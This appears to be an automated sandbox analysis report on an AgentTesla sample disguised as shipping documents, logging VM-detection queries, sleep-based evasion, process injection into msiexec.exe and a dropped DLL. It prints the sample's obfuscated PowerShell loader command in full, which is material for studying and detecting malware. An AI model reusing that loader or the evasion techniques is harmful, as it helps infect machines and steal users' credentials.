Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599104	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598996	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598664	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598092	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595682	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595357	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595026	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7933			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1611			Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Evaded block: after key decision

graph_0-3901

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6084	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4196	Thread sleep count: 3145 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4196	Thread sleep count: 6704 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599435s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -599104s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598996s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598664s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598420s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -598092s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597546s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597218s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595682s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595357s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -595026s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -594921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4092	Thread sleep time: -594593s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00406719
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_004065CF FindFirstFileW,FindClose,	0_2_004065CF
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599104	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598996	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598664	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598420	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598092	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597546	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597218	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595682	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595357	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595026	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594593	Jump to behavior

Source: msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: msiexec.exe, 00000006.00000002.3291573272.0000000000858000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000002.3291573272.0000000000858000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWr*og

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

API call chain: ExitProcess graph end node

graph_0-3787

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_045AD41C LdrInitializeThunk,

1_2_045AD41C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3DC0000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 37FA3C			Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Code function: 0_2_7347114E GetModuleFileNameW,GlobalAlloc,CharPrevW,CloseHandle,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,lstrcpyW,lstrcpyW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,GetTickCount,lstrcpyW,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,lstrcpyW,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,CharNextExA,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,

0_2_7347114E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

0_2_004036FC

Stealing of Sensitive Information

Yara detected AgentTesla

